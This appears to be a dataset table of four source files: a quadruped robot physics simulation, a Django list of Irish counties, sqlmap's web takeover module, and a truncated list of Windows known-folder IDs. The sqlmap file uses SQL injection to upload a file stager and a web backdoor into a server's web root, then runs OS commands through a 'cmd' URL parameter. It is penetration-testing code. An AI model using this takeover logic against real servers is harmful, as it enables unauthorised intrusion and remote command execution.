repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
MartinStolle/quadruped-walking-gaits | tags/Simulation/Source Code/Robot.py | 2 | 20315 | '''
Author: Martin Stolle
Description: Builds and controls the Robot
'''
import ode
from visual import vector, pi, sphere, points
import vpyode
import numpy
from random import gauss, uniform
from math import *
import threading
import Constants as const
from Graph import Graph
class Robot:
def __init__(self, world, space, density):
self.world = world
self.space = space
self.density = density
self.femurHeight = const.femurHeight
self.femurWidth = const.femurWidth
self.femurLength = const.femurLength
self.tibiaHeight = const.tibiaHeight
self.tibiaWidth = const.tibiaWidth
self.tibiaLength = const.tibiaLength
self.densityFemur = 10
self.densityTibia = 10
self.FMax = 10000
self.totalMass = 0.0
self.bodyExist = True
self.showLabels = True
self.center = (0,0,0)
self.joints = []
self.check = 0
self.checkBack = 0
self.centerRobot = True
self.minDeg = const.minDeg
self.maxDeg = const.maxDeg
self.maxTibiaDeg = const.tibiaDeg
self.time = 0.5
# means how many percent of the body do have the density
# like human body where only 90% is water
self.bodyCoverage = 1.0
self.graph = Graph()
self.graphVal = []
def setLegs(self):
'''Adds some legs to our robot'''
self.femur = [] # body
self.tibia = [] # body
for i in range(const.numLegs):
tmpFemur = self.createBody(self.femurLength,
self.femurHeight,
self.femurWidth,
self.densityFemur)
self.femur.append(tmpFemur)
for i in range(const.numLegs):
tmpTibia = self.createBody(self.tibiaLength,
self.tibiaHeight,
self.tibiaWidth,
self.densityTibia)
self.tibia.append(tmpTibia)
def createBody(self, lx, ly, lz, density):
'''Creates the geom, body and visual box'''
# Create body
body = vpyode.GDMFrameBody(self.world)
element = vpyode.GDMElement()
element.DefineBox((density*self.bodyCoverage), lx, ly, lz)
body.AddGDMElement('Box', element)
self.totalMass += body.getMass().mass
return body
def dropRobot(self):
'''Drops the whole body'''
self.body = self.createBody(const.bodyLength,
const.bodyHeight,
const.bodyWidth,
self.density)
self.setLegs()
self.dropLegs()
self.dropBody()
self.createJoints()
def createJoints(self):
'''Create the connections between the legs and body
Note: Actually we do net set some of the legs to 90deg. The limitation
of the angle stops before we can reach that angle. The reason for
using that approach is that the force used for reaching that angle
is much higher that way.'''
self.joints = []
for i in range(const.numLegs):
fX = const.bodyLength/2
fY = const.bodyHeight/2+const.Height
fZ = const.bodyWidth/2
tX = const.bodyLength/2
tY = const.bodyHeight/2+const.Height
tZ = const.bodyWidth/2+self.femurWidth/2#+const.tibiaWidth/2
if i == 0:
self.addHingeJoint(self.femur[i], self.body,
(fX, fY, fZ),
(0, -1, 0), -0,
self.minDeg, self.maxDeg)
self.addHingeJoint(self.tibia[i], self.femur[i],
(tX, tY, tZ),
(1, 0, 0), const.maxAngle, -0.01,
self.maxTibiaDeg)
elif i == 1:
self.addHingeJoint(self.femur[i], self.body,
(-fX, fY, fZ),
(0, -1, 0), 0,
self.maxDeg, self.minDeg)
self.addHingeJoint(self.tibia[i], self.femur[i],
(-tX, tY, tZ),
(1, 0, 0), const.maxAngle, -0.01,
self.maxTibiaDeg)
elif i == 2:
self.addHingeJoint(self.femur[i], self.body,
(-fX, fY, -fZ),
(0, -1, 0), -const.maxAngle,
self.minDeg, self.maxDeg)
self.addHingeJoint(self.tibia[i], self.femur[i],
(-tX, tY, -tZ),
(-1, 0, 0), const.maxAngle, -0.01,
self.maxTibiaDeg)
elif i == 3:
self.addHingeJoint(self.femur[i], self.body,
(fX, fY, -fZ),
(0, -1, 0), const.maxAngle,
self.maxDeg, self.minDeg)
self.addHingeJoint(self.tibia[i], self.femur[i],
(tX, tY, -tZ),
(-1, 0, 0), const.maxAngle, -0.01,
self.maxTibiaDeg)
def addFixedJoint(self, body1, body2):
''' '''
joint = ode.FixedJoint(self.world)
joint.attach(body1, body2)
joint.setFixed()
return joint
def addHingeJoint(self, body1, body2, anchor, axis, degree=0, loStop = 0.2, hiStop=0.2):
''' '''
joint = ode.HingeJoint(self.world)
joint.attach(body1, body2)
joint.setAnchor(anchor)
joint.setAxis(axis)
joint.setParam(ode.ParamLoStop, -pi * hiStop) # must be smaller than -pi
joint.setParam(ode.ParamHiStop, pi * loStop) # must be smaller than pi
joint.setParam(ode.ParamFMax, self.FMax)
joint.setParam(ode.ParamVel, self.DegreeToRadian(degree))
joint.addTorque(self.FMax)
self.joints.append([joint, self.visualizeHinge(anchor)])
def setAngle(self, val, jNr):
'''sets the angle of a specific joint'''
val -= 180
self.joints[jNr][0].setParam(ode.ParamVel, self.DegreeToRadian(val))
def visualizeHinge(self, anchor):
'''shows a point where the anchor point of the joint is'''
#points(pos=[anchor], size=5, color=(1,0,0))
return sphere(pos=anchor, radius=0.3, color=(0,0,1))
def removeJointVisuals(self):
for joint in self.joints:
joint[1].visible = False
del joint[1]
def refreshJoints(self):
for joint in self.joints:
joint[1].pos = joint[0].getAnchor2()
def dropLegs(self):
'''Drops the legs of the robot'''
fX = const.bodyLength/2
fY = const.bodyHeight/2+const.Height
fZ = const.bodyWidth/2+self.femurWidth/2
i=0
for leg in self.femur:
if i == 0:
leg.setPosition((fX, fY, fZ))
elif i == 1:
leg.setPosition((-fX, fY, fZ))
elif i == 2:
leg.setPosition((-fX, fY, -fZ))
elif i == 3:
leg.setPosition((fX, fY, -fZ))
i+=1
i=0
fX = const.bodyLength/2
fY = const.bodyHeight/2-self.femurHeight/2-self.tibiaHeight/2+const.Height
fZ = const.bodyWidth/2+self.femurWidth+self.tibiaWidth/2
for leg in self.tibia:
if i == 0:
leg.setPosition((fX, fY, fZ))
elif i == 1:
leg.setPosition((-fX, fY, fZ))
elif i == 2:
leg.setPosition((-fX, fY, -fZ))
elif i == 3:
leg.setPosition((fX, fY, -fZ))
i+=1
def dropBody(self):
'''drops the main body of the robot'''
self.body.setPosition( (0, const.bodyHeight/2+const.Height, 0) )
def refreshRobot(self, lBody, lFemur=None, lTibia=None):
'''Refreshes the position of the labels and camera'''
self.refreshBody(lBody)
#self.refreshLegs(lTibia, lFemur)
self.refreshJoints()
def refreshBody(self, lBody):
'''Refreshes the label position and the camera of the center body'''
self.body.UpdateDisplay()
x,y,z = self.body.getPosition()
self.center = (x,y,z)
self.refreshGraph((x,y))
if self.showLabels:
lBody.pos = (x,y,z)
lBody.text = '%.2f, %.2f, %.2f, %.1f kg' % (x,y,z,self.totalMass)
def refreshGraph(self, val):
if len(self.graphVal) > const.maxSize:
self.graphVal = []
else:
self.graphVal.append(val)
self.graph.plotData(self.graphVal)
def refreshLegs(self, lTibia, lFemur):
'''Refreshes the position of the labels'''
for i in range(len(self.femur)):
x,y,z = self.femur[i].getPosition()
lFemur.pos = (x,y,z)
for i in range(len(self.tibia)):
x,y,z = self.tibia[i].getPosition()
lTibia.pos = (x,y,z)
def scalp (self, vec, scal):
'''geometric utility functions - from ODE example'''
vec[0] *= scal
vec[1] *= scal
vec[2] *= scal
def length (self, vec):
'''geometric utility functions - from ODE example'''
return sqrt (vec[0]**2 + vec[1]**2 + vec[2]**2)
def DegreeToRadian(self, deg):
'''geometric utility functions - from ODE example '''
return float(deg)/180.0 * pi
def RadianToDegree(self, rad):
'''geometric utility functions - from ODE example '''
return rad/pi * 180
def pushRobot(self):
'''Applies a force to the robot - from ODE Example'''
l = self.body.getPosition ()
d = self.length (l)
a = max(0, 800000*(1.0-0.2*d*d))
l = [l[1] / 4, l[1], l[2] /4]
self.scalp (l, a / self.length (l))
for leg in self.femur:
leg.addForce(l)
for leg in self.tibia:
leg.addForce(l)
self.body.addRelForce(l)
print 'Applied Force: ', l
def setDensity(self, val):
'''Sets the density of the robot, considering the percentage it is
covered with the material'''
self.density = (float(val)*self.bodyCoverage)
def setFemurDensity(self, val):
'''Sets the density of the femur, considering the percentage it is
covered with the material'''
self.densityFemur = (float(val)*self.bodyCoverage)
def setTibiaDensity(self, val):
'''Sets the density of the tibia, considering the percentage it is
covered with the material'''
self.densityTibia = (float(val)*self.bodyCoverage)
def setFemurLength(self, val):
self.femurHeight = float(val)
def setFemurHeight(self, val):
self.femurHeight = float(val)
def setFemurWidth(self, val):
self.femurWidth = float(val)
def setTibiaLength(self, val):
self.tibiaLength = float(val)
def setTibiaHeight(self, val):
self.tibiaHeight = float(val)
def setTibiaWidth(self, val):
self.tibiaWidth = float(val)
def setMinDeg(self, val):
self.minDeg = float(val)
def setMaxDeg(self, val):
self.maxDeg = float(val)
def setTibiaMaxDeg(self, val):
self.maxTibiaDeg = float(val)
def setBodyCoverage(self, val):
'''Percentage of the body using the material'''
self.bodyCoverage = float(val)
print 'Bodyshare = %2.1f percent' % (float(val)*100)
def setFMax(self, val):
'''The maximum force or torque that the motor will use to achieve the
desired velocity. Must be greater than zero. 0 = motor off'''
for joint in self.joints:
joint[0].setParam(ode.ParamFMax, float(val))
self.FMax = float(val)
print 'Torque = %1.2f' % (float(val))
def bodyExists(self):
'''Returns the boolean if the robot body exists'''
return self.bodyExist
def dropAgain(self):
'''Removes the old body and readds it to its initial position'''
self.bodyExist = False
self.check = 0
self.totalMass = 0.0
for b in self.body.GetElementKeys():
self.body.RemoveElement(b)
for leg in self.femur:
for b in leg.GetElementKeys():
leg.RemoveElement(b)
for leg in self.tibia:
for b in leg.GetElementKeys():
leg.RemoveElement(b)
self.removeJointVisuals()
self.dropRobot()
print 'total mass is %.1f kg' % (self.totalMass)
self.bodyExist = True
def moveForward(self):
if self.check == 0:
t = threading.Timer(self.time, self.moveForward)
t.start()
self.check += 1
self.setAngle(90, 3)
self.setAngle(270, 2)
elif self.check == 1:
t = threading.Timer(self.time, self.moveForward)
t.start()
self.check += 1
self.setAngle(270, 3)
self.setAngle(90, 0)
elif self.check == 2:
t = threading.Timer(self.time, self.moveForward)
t.start()
self.check += 1
self.setAngle(90, 7)
self.setAngle(90, 6)
elif self.check == 3:
t = threading.Timer(self.time, self.moveForward)
t.start()
self.check += 1
self.setAngle(270, 7)
self.setAngle(270, 4)
elif self.check == 4:
t = threading.Timer(self.time, self.moveForward)
t.start()
self.check += 1
self.setAngle(90, 5)
self.setAngle(90, 4)
elif self.check == 5:
t = threading.Timer(self.time, self.moveForward)
t.start()
self.check += 1
self.setAngle(270, 5)
self.setAngle(270, 6)
elif self.check == 6:
t = threading.Timer(self.time, self.moveForward)
t.start()
self.check += 1
self.setAngle(90, 1)
self.setAngle(270, 0)
elif self.check == 7:
self.check = 0
self.setAngle(270, 1)
self.setAngle(90, 2)
def moveBackward(self):
if self.check == 0:
t = threading.Timer(self.time, self.moveBackward)
t.start()
self.check += 1
self.setAngle(90, 1)
self.setAngle(90, 0)
elif self.check == 1:
t = threading.Timer(self.time, self.moveBackward)
t.start()
self.check += 1
self.setAngle(270, 1)
self.setAngle(270, 2)
elif self.check == 2:
t = threading.Timer(self.time, self.moveBackward)
t.start()
self.check += 1
self.setAngle(90, 5)
self.setAngle(270, 4)
elif self.check == 3:
t = threading.Timer(self.time, self.moveBackward)
t.start()
self.check += 1
self.setAngle(270, 5)
self.setAngle(90, 6)
elif self.check == 4:
t = threading.Timer(self.time, self.moveBackward)
t.start()
self.check += 1
self.setAngle(90, 7)
self.setAngle(270, 6)
elif self.check == 5:
t = threading.Timer(self.time, self.moveBackward)
t.start()
self.check += 1
self.setAngle(270, 7)
self.setAngle(90, 4)
elif self.check == 6:
t = threading.Timer(self.time, self.moveBackward)
t.start()
self.check += 1
self.setAngle(90, 3)
self.setAngle(90, 2)
elif self.check == 7:
self.check = 0
self.setAngle(270, 3)
self.setAngle(270, 0)
def turnLeft(self):
if self.check == 0:
t = threading.Timer(self.time, self.turnLeft)
t.start()
self.check += 1
self.setAngle(90, 3)
self.setAngle(270, 2)
elif self.check == 1:
t = threading.Timer(self.time, self.turnLeft)
t.start()
self.check += 1
self.setAngle(270, 3)
self.setAngle(90, 0)
elif self.check == 2:
t = threading.Timer(self.time, self.turnLeft)
t.start()
self.check += 1
self.setAngle(90, 5)
self.setAngle(270, 4)
elif self.check == 3:
t = threading.Timer(self.time, self.turnLeft)
t.start()
self.check += 1
self.setAngle(270, 5)
self.setAngle(90, 6)
elif self.check == 4:
t = threading.Timer(self.time, self.turnLeft)
t.start()
self.check += 1
self.setAngle(90, 7)
self.setAngle(270, 6)
elif self.check == 5:
t = threading.Timer(self.time, self.turnLeft)
t.start()
self.check += 1
self.setAngle(270, 7)
self.setAngle(90, 4)
elif self.check == 6:
t = threading.Timer(self.time, self.turnLeft)
t.start()
self.check += 1
self.setAngle(90, 1)
self.setAngle(270, 0)
elif self.check == 7:
self.check = 0
self.setAngle(270, 1)
self.setAngle(90, 2)
def turnRight(self):
if self.check == 0:
t = threading.Timer(self.time, self.turnRight)
t.start()
self.check += 1
self.setAngle(90, 1)
self.setAngle(90, 0)
elif self.check == 1:
t = threading.Timer(self.time, self.turnRight)
t.start()
self.check += 1
self.setAngle(270, 1)
self.setAngle(270, 2)
elif self.check == 2:
t = threading.Timer(self.time, self.turnRight)
t.start()
self.check += 1
self.setAngle(90, 7)
self.setAngle(90, 6)
elif self.check == 3:
t = threading.Timer(self.time, self.turnRight)
t.start()
self.check += 1
self.setAngle(270, 7)
self.setAngle(270, 4)
elif self.check == 4:
t = threading.Timer(self.time, self.turnRight)
t.start()
self.check += 1
self.setAngle(90, 5)
self.setAngle(90, 4)
elif self.check == 5:
t = threading.Timer(self.time, self.turnRight)
t.start()
self.check += 1
self.setAngle(270, 5)
self.setAngle(270, 6)
elif self.check == 6:
t = threading.Timer(self.time, self.turnRight)
t.start()
self.check += 1
self.setAngle(90, 3)
self.setAngle(90, 2)
elif self.check == 7:
self.check = 0
self.setAngle(270, 3)
self.setAngle(270, 0) | gpl-2.0 |
noslenfa/tdjangorest | uw/lib/python2.7/site-packages/django/contrib/localflavor/ie/ie_counties.py | 503 | 1127 | """
Sources:
Irish Counties: http://en.wikipedia.org/wiki/Counties_of_Ireland
"""
from django.utils.translation import ugettext_lazy as _
IE_COUNTY_CHOICES = (
('antrim', _('Antrim')),
('armagh', _('Armagh')),
('carlow', _('Carlow')),
('cavan', _('Cavan')),
('clare', _('Clare')),
('cork', _('Cork')),
('derry', _('Derry')),
('donegal', _('Donegal')),
('down', _('Down')),
('dublin', _('Dublin')),
('fermanagh', _('Fermanagh')),
('galway', _('Galway')),
('kerry', _('Kerry')),
('kildare', _('Kildare')),
('kilkenny', _('Kilkenny')),
('laois', _('Laois')),
('leitrim', _('Leitrim')),
('limerick', _('Limerick')),
('longford', _('Longford')),
('louth', _('Louth')),
('mayo', _('Mayo')),
('meath', _('Meath')),
('monaghan', _('Monaghan')),
('offaly', _('Offaly')),
('roscommon', _('Roscommon')),
('sligo', _('Sligo')),
('tipperary', _('Tipperary')),
('tyrone', _('Tyrone')),
('waterford', _('Waterford')),
('westmeath', _('Westmeath')),
('wexford', _('Wexford')),
('wicklow', _('Wicklow')),
)
| apache-2.0 |
V11/volcano | server/sqlmap/lib/takeover/web.py | 1 | 14805 | #!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import urlparse
import os
import re
import StringIO
from tempfile import mkstemp
from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getAutoDirectories
from lib.core.common import getManualDirectories
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSQLSnippet
from lib.core.common import getUnicode
from lib.core.common import ntToPosixSlashes
from lib.core.common import isTechniqueAvailable
from lib.core.common import isWindowsDriveLetterPath
from lib.core.common import normalizePath
from lib.core.common import posixToNtSlashes
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.enums import PAYLOAD
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
from lib.core.settings import EVENTVALIDATION_REGEX
from lib.core.settings import VIEWSTATE_REGEX
from lib.request.connect import Connect as Request
from thirdparty.oset.pyoset import oset
class Web:
"""
This class defines web-oriented OS takeover functionalities for
plugins.
"""
def __init__(self):
self.webApi = None
self.webBaseUrl = None
self.webBackdoorUrl = None
self.webBackdoorFilePath = None
self.webStagerUrl = None
self.webStagerFilePath = None
self.webDirectory = None
def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None:
return
output = None
if not cmd:
cmd = conf.osCmd
cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)
if page is not None:
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if output:
output = output.group(1)
return output
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
if filepath is not None:
if filepath.endswith('_'):
content = decloak(filepath) # cloaked file
else:
with open(filepath, "rb") as f:
content = f.read()
if content is not None:
stream = StringIO.StringIO(content) # string content
return self._webFileStreamUpload(stream, destFileName, directory)
def _webFileStreamUpload(self, stream, destFileName, directory):
stream.seek(0) # Rewind
try:
setattr(stream, "name", destFileName)
except TypeError:
pass
if self.webApi in getPublicTypeMembers(WEB_API, True):
multipartParams = {
"upload": "1",
"file": stream,
"uploadDir": directory,
}
if self.webApi == WEB_API.ASPX:
multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the file through the web file "
warnMsg += "stager to '%s'" % directory
logger.warn(warnMsg)
return False
else:
return True
else:
logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi)
return False
def _webFileInject(self, fileContent, fileName, directory):
outFile = ntToPosixSlashes(os.path.join(directory, fileName))
uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
query = ""
if isTechniqueAvailable(kb.technique):
where = kb.injection.data[kb.technique].where
if where == PAYLOAD.WHERE.NEGATIVE:
randInt = randomInt()
query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
query = agent.prefixQuery(query)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query)
page = Request.queryPage(payload)
return page
def webInit(self):
"""
This method is used to write a web backdoor (agent) on a writable
remote directory within the web server document root.
"""
if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
return
self.checkDbmsOs()
default = None
choices = list(getPublicTypeMembers(WEB_API, True))
for ext in choices:
if conf.url.endswith(ext):
default = ext
break
if not default:
default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP
message = "which web application language does the web server "
message += "support?\n"
for count in xrange(len(choices)):
ext = choices[count]
message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))
if default == ext:
default = count + 1
message = message[:-1]
while True:
choice = readInput(message, default=str(default))
if not choice.isdigit():
logger.warn("invalid value, only digits are allowed")
elif int(choice) < 1 or int(choice) > len(choices):
logger.warn("invalid value, it must be between 1 and %d" % len(choices))
else:
self.webApi = choices[int(choice) - 1]
break
directories = list(arrayizeValue(getManualDirectories()))
directories.extend(getAutoDirectories())
directories = list(oset(directories))
backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))
stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
success = False
for directory in directories:
self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))
if success:
break
if not directory:
continue
uploaded = False
directory = ntToPosixSlashes(normalizePath(directory))
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
directory = "/%s" % directory
else:
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
# Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
logger.info(infoMsg)
self._webFileInject(stagerContent, stagerName, directory)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
# Fall-back to UNION queries file upload method
if not uploaded:
warnMsg = "unable to upload the file stager "
warnMsg += "on '%s'" % directory
singleTimeWarnMessage(warnMsg)
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
infoMsg = "trying to upload the file stager on '%s' " % directory
infoMsg += "via UNION method"
logger.info(infoMsg)
handle, filename = mkstemp()
os.fdopen(handle).close() # close low level handle (causing problems later)
with open(filename, "w+") as f:
_ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
_ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
f.write(utf8encode(_))
self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
for match in re.finditer('/', directory):
self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" in uplPage:
uploaded = True
break
# Extra check - required
if not uploaded:
self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)
debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
logger.debug(debugMsg)
uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage = uplPage or ""
if "sqlmap file uploader" not in uplPage:
continue
if "<%" in uplPage or "<?" in uplPage:
warnMsg = "file stager uploaded on '%s', " % directory
warnMsg += "but not dynamically interpreted"
logger.warn(warnMsg)
continue
elif self.webApi == WEB_API.ASPX:
kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)
infoMsg = "the file stager has been successfully uploaded "
infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
logger.info(infoMsg)
if self.webApi == WEB_API.ASP:
match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)
if match:
backdoorDirectory = match.group(1)
else:
continue
_ = "tmpe%s.exe" % randomStr(lowercase=True)
if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory
else:
continue
else:
if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "through the file stager possibly because "
warnMsg += "the user running the web server process "
warnMsg += "has not write privileges over the folder "
warnMsg += "where the user running the DBMS process "
warnMsg += "was able to upload the file stager or "
warnMsg += "because the DBMS and web server sit on "
warnMsg += "different servers"
logger.warn(warnMsg)
message = "do you want to try the same method used "
message += "for the file stager? [Y/n] "
getOutput = readInput(message, default="Y")
if getOutput in ("y", "Y"):
self._webFileInject(backdoorContent, backdoorName, directory)
else:
continue
self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName))
self.webDirectory = directory
self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName))
testStr = "command execution test"
output = self.webBackdoorRunCmd("echo %s" % testStr)
if output == "0":
warnMsg = "the backdoor has been uploaded but required privileges "
warnMsg += "for running the system commands are missing"
raise SqlmapNoneDataException(warnMsg)
elif output and testStr in output:
infoMsg = "the backdoor has been successfully "
else:
infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s' - " % self.webDirectory
infoMsg += self.webBackdoorUrl
logger.info(infoMsg)
success = True
break
| mit |
jorik041/plaso | plaso/winnt/known_folder_ids.py | 4 | 17897 | # -*- coding: utf-8 -*-
"""This file contains the Windows NT Known Folder identifier definitions."""
# For now ignore the line too long errors.
# pylint: disable=line-too-long
# For now copied from:
# https://code.google.com/p/libfwsi/wiki/KnownFolderIdentifiers
# TODO: store these in a database or equiv.
DESCRIPTIONS = {
u'008ca0b1-55b4-4c56-b8a8-4de4b299d3be': u'Account Pictures',
u'00bcfc5a-ed94-4e48-96a1-3f6217f21990': u'Roaming Tiles',
u'0139d44e-6afe-49f2-8690-3dafcae6ffb8': u'(Common) Programs',
u'0482af6c-08f1-4c34-8c90-e17ec98b1e17': u'Public Account Pictures',
u'054fae61-4dd8-4787-80b6-090220c4b700': u'Game Explorer (Game Tasks)',
u'0762d272-c50a-4bb0-a382-697dcd729b80': u'Users (User Profiles)',
u'0ac0837c-bbf8-452a-850d-79d08e667ca7': u'Computer (My Computer)',
u'0d4c3db6-03a3-462f-a0e6-08924c41b5d4': u'History',
u'0f214138-b1d3-4a90-bba9-27cbc0c5389a': u'Sync Setup',
u'15ca69b3-30ee-49c1-ace1-6b5ec372afb5': u'Sample Playlists',
u'1777f761-68ad-4d8a-87bd-30b759fa33dd': u'Favorites',
u'18989b1d-99b5-455b-841c-ab7c74e4ddfc': u'Videos (My Video)',
u'190337d1-b8ca-4121-a639-6d472d16972a': u'Search Results (Search Home)',
u'1a6fdba2-f42d-4358-a798-b74d745926c5': u'Recorded TV',
u'1ac14e77-02e7-4e5d-b744-2eb1ae5198b7': u'System32 (System)',
u'1b3ea5dc-b587-4786-b4ef-bd1dc332aeae': u'Libraries',
u'1e87508d-89c2-42f0-8a7e-645a0f50ca58': u'Applications',
u'2112ab0a-c86a-4ffe-a368-0de96e47012e': u'Music',
u'2400183a-6185-49fb-a2d8-4a392a602ba3': u'Public Videos (Common Video)',
u'24d89e24-2f19-4534-9dde-6a6671fbb8fe': u'One Drive Documents',
u'289a9a43-be44-4057-a41b-587a76d7e7f9': u'Sync Results',
u'2a00375e-224c-49de-b8d1-440df7ef3ddc': u'Localized Resources (Directory)',
u'2b0f765d-c0e9-4171-908e-08a611b84ff6': u'Cookies',
u'2c36c0aa-5812-4b87-bfd0-4cd0dfb19b39': u'Original Images',
u'3214fab5-9757-4298-bb61-92a9deaa44ff': u'Public Music (Common Music)',
u'339719b5-8c47-4894-94c2-d8f77add44a6': u'One Drive Pictures',
u'33e28130-4e1e-4676-835a-98395c3bc3bb': u'Pictures (My Pictures)',
u'352481e8-33be-4251-ba85-6007caedcf9d': u'Internet Cache (Temporary Internet Files)',
u'374de290-123f-4565-9164-39c4925e467b': u'Downloads',
u'3d644c9b-1fb8-4f30-9b45-f670235f79c0': u'Public Downloads (Common Downloads)',
u'3eb685db-65f9-4cf6-a03a-e3ef65729f3d': u'Roaming Application Data (Roaming)',
u'43668bf8-c14e-49b2-97c9-747784d784b7': u'Sync Center (Sync Manager)',
u'48daf80b-e6cf-4f4e-b800-0e69d84ee384': u'Libraries',
u'491e922f-5643-4af4-a7eb-4e7a138d8174': u'Videos',
u'4bd8d571-6d19-48d3-be97-422220080e43': u'Music (My Music)',
u'4bfefb45-347d-4006-a5be-ac0cb0567192': u'Conflicts',
u'4c5c32ff-bb9d-43b0-b5b4-2d72e54eaaa4': u'Saved Games',
u'4d9f7874-4e0c-4904-967b-40b0d20c3e4b': u'Internet (The Internet)',
u'52528a6b-b9e3-4add-b60d-588c2dba842d': u'Homegroup',
u'52a4f021-7b75-48a9-9f6b-4b87a210bc8f': u'Quick Launch',
u'56784854-c6cb-462b-8169-88e350acb882': u'Contacts',
u'5b3749ad-b49f-49c1-83eb-15370fbd4882': u'Tree Properties',
u'5cd7aee2-2219-4a67-b85d-6c9ce15660cb': u'Programs',
u'5ce4a5e9-e4eb-479d-b89f-130c02886155': u'Device Metadata Store',
u'5e6c858f-0e22-4760-9afe-ea3317b67173': u'Profile (User\'s name)',
u'625b53c3-ab48-4ec1-ba1f-a1ef4146fc19': u'Start Menu',
u'62ab5d82-fdc1-4dc3-a9dd-070d1d495d97': u'Program Data',
u'6365d5a7-0f0d-45e5-87f6-0da56b6a4f7d': u'Common Files (x64)',
u'69d2cf90-fc33-4fb7-9a0c-ebb0f0fcb43c': u'Slide Shows (Photo Albums)',
u'6d809377-6af0-444b-8957-a3773f02200e': u'Program Files (x64)',
u'6f0cd92b-2e97-45d1-88ff-b0d186b8dedd': u'Network Connections',
u'724ef170-a42d-4fef-9f26-b60e846fba4f': u'Administrative Tools',
